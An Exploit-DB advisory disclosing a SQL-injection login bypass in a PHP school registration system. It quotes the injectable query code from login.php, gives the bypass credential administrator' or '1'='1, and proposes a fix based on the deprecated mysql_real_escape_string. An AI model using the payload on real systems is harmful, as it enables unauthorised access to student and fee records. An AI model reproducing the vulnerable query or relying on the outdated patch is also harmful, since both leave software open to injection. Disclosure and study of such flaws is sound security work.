School Registration and Fee System - Authentication Bypass

2016-11-01T00:00:00
ID EDB-ID:40671
Type exploitdb
Reporter opt1lc
Modified 2016-11-01T00:00:00

Description

School Registration and Fee System - Authentication Bypass. Webapps exploit for PHP platform

                                        
                                            # Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A

# File....................... bilal_final/login.php
---------------------------------------------------

		----snip----

		$username = $_POST['username'];
		$password = $_POST['password'];
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Exploit 
-------
You can login with username and password : administrator' or '1'='1 


Patching
-------
You can use one of function in PHP : mysql_real_escape_string() to 
---------------------------------------------------

		----snip----

		$username = mysql_real_escape_string($_POST['username']);
		$password = mysql_real_escape_string($_POST['password']);
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Credit
-------
This vulnerability was discovered and researched by opt1lc

Shout
-------
My Beautiful Daughter & My Wife

Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php